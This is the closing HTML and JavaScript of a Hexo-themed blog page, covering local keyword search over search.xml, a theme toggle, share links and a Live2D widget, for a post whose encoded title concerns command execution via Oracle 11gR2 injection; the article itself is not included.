      if(event.keyCode == 13)
        return false
    }

    function openOrHideSearchContent() {
      let isHidden = searchOverlayArea.classList.contains('hidden')
      if (isHidden) {
        searchOverlayArea.classList.remove('hidden')
        document.body.classList.add('hidden')
        // inputArea.focus()
      } else {
        searchOverlayArea.classList.add('hidden')
        document.body.classList.remove('hidden')
      }
    }

    function blurSearchContent(e) {
      if (e.target === searchOverlayArea) {
        openOrHideSearchContent()
      }
    }

    document.querySelector("#search-icon").addEventListener("click", openOrHideSearchContent, false)
    document.querySelector("#search-close-icon").addEventListener("click", openOrHideSearchContent, false)
    searchOverlayArea.addEventListener("click", blurSearchContent, false)

    var searchFunc = function (path, search_id, content_id) {
      'use strict';
      var $input = document.getElementById(search_id);
      var $resultContent = document.getElementById(content_id);
      $resultContent.innerHTML = "<ul><span class='local-search-empty'>First search, index file loading, please wait...<span></ul>";
      $.ajax({
        // 0x01. load xml file
        url: path,
        dataType: "xml",
        success: function (xmlResponse) {
          // 0x02. parse xml file
          var datas = $("entry", xmlResponse).map(function () {
            return {
              title: $("title", this).text(),
              content: $("content", this).text(),
              url: $("url", this).text()
            };
          }).get();
          $resultContent.innerHTML = "";

          $input.addEventListener('input', function () {
            // 0x03. parse query to keywords list
            var str = '<ul class=\"search-result-list\">';
            var keywords = this.value.trim().toLowerCase().split(/[\s\-]+/);
            $resultContent.innerHTML = "";
            if (this.value.trim().length <= 0) {
              return;
            }
            // 0x04. perform local searching
            datas.forEach(function (data) {
              var isMatch = true;
              var content_index = [];
              if (!data.title || data.title.trim() === '') {
                data.title = "Untitled";
              }
              var orig_data_title = data.title.trim();
              var data_title = orig_data_title.toLowerCase();
              var orig_data_content = data.content.trim().replace(/<[^>]+>/g, "");
              var data_content = orig_data_content.toLowerCase();
              var data_url = data.url;
              var index_title = -1;
              var index_content = -1;
              var first_occur = -1;
              // only match artiles with not empty contents
              if (data_content !== '') {
                keywords.forEach(function (keyword, i) {
                  index_title = data_title.indexOf(keyword);
                  index_content = data_content.indexOf(keyword);

                  if (index_title < 0 && index_content < 0) {
                    isMatch = false;
                  } else {
                    if (index_content < 0) {
                      index_content = 0;
                    }
                    if (i == 0) {
                      first_occur = index_content;
                    }
                    // content_index.push({index_content:index_content, keyword_len:keyword_len});
                  }
                });
              } else {
                isMatch = false;
              }
              // 0x05. show search results
              if (isMatch) {
                str += "<li><a href='" + data_url + "' class='search-result-title'>" + orig_data_title + "</a>";
                var content = orig_data_content;
                if (first_occur >= 0) {
                  // cut out 100 characters
                  var start = first_occur - 20;
                  var end = first_occur + 80;

                  if (start < 0) {
                    start = 0;
                  }

                  if (start == 0) {
                    end = 100;
                  }

                  if (end > content.length) {
                    end = content.length;
                  }

                  var match_content = content.substr(start, end);

                  // highlight all keywords
                  keywords.forEach(function (keyword) {
                    var regS = new RegExp(keyword, "gi");
                    match_content = match_content.replace(regS, "<span class=\"search-keyword\">" + keyword + "</span>");
                  });

                  str += "<p class=\"search-result-abstract\">" + match_content + "...</p>"
                }
                str += "</li>";
              }
            });
            str += "</ul>";
            if (str.indexOf('<li>') === -1) {
              return $resultContent.innerHTML = "<ul><span class='local-search-empty'>No result<span></ul>";
            }
            $resultContent.innerHTML = str;
          });
        },
        error: function(xhr, status, error) {
          $resultContent.innerHTML = ""
          if (xhr.status === 404) {
            $resultContent.innerHTML = "<ul><span class='local-search-empty'>The search.xml file was not found, please refer to：<a href='https://github.com/zchengsite/hexo-theme-oranges#configuration' target='_black'>configuration</a><span></ul>";
          } else {
            $resultContent.innerHTML = "<ul><span class='local-search-empty'>The request failed, Try to refresh the page or try again later.<span></ul>";
          }
        }
      });
      $(document).on('click', '#search-close-icon', function() {
        $('#search-input').val('');
        $('#search-result').html('');
      });
    }

    var getSearchFile = function() {
        var path = "/search.xml";
        searchFunc(path, 'search-input', 'search-result');
    }
  </script>




        
  <div class="tools-bar-item theme-icon" id="switch-color-scheme">
    <a href="javascript: void(0)">
      <i id="theme-icon" class="iconfont icon-moon"></i>
    </a>
  </div>

  
<script src="/js/colorscheme.js"></script>





        
  
    <div class="share-icon tools-bar-item">
      <a href="javascript: void(0)" id="share-icon">
        <i class="iconfont iconshare"></i>
      </a>
      <div class="share-content hidden">
        
          <a class="share-item" href="https://twitter.com/intent/tweet?text=' + Oracle%2011gR2%E6%B3%A8%E5%85%A5%E7%9A%84%E4%B8%80%E7%A7%8D%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E5%A7%BF%E5%8A%BF + '&url=' + http%3A%2F%2Fexample.com%2F2022%2F04%2F14%2FOracle%252011gR2%25E6%25B3%25A8%25E5%2585%25A5%25E7%259A%2584%25E4%25B8%2580%25E7%25A7%258D%25E5%2591%25BD%25E4%25BB%25A4%25E6%2589%25A7%25E8%25A1%258C%25E5%25A7%25BF%25E5%258A%25BF%2F + '" target="_blank" title="Twitter">
            <i class="iconfont icon-twitter"></i>
          </a>
        
        
          <a class="share-item" href="https://www.facebook.com/sharer.php?u=http://example.com/2022/04/14/Oracle%2011gR2%E6%B3%A8%E5%85%A5%E7%9A%84%E4%B8%80%E7%A7%8D%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E5%A7%BF%E5%8A%BF/" target="_blank" title="Facebook">
            <i class="iconfont icon-facebooksquare"></i>
          </a>
        
      </div>
    </div>
  
  
<script src="/js/shares.js"></script>



      </div>
    </div>
  <script src="/live2dw/lib/L2Dwidget.min.js?094cbace49a39548bed64abff5988b05"></script><script>L2Dwidget.init({"model":{"jsonPath":"/live2dw/assets/koharu.model.json"},"display":{"position":"right","width":150,"height":300},"mobile":{"show":false},"log":false,"pluginJsPath":"lib/","pluginModelPath":"assets/","pluginRootPath":"live2dw/","tagMode":false});</script></body>
</html>
<script type="text/javascript" src="/js/FunnyTitle.js"></script>
<!-- 页面点击小红心 -->
<script type="text/javascript" src="/js/love.js"></script>
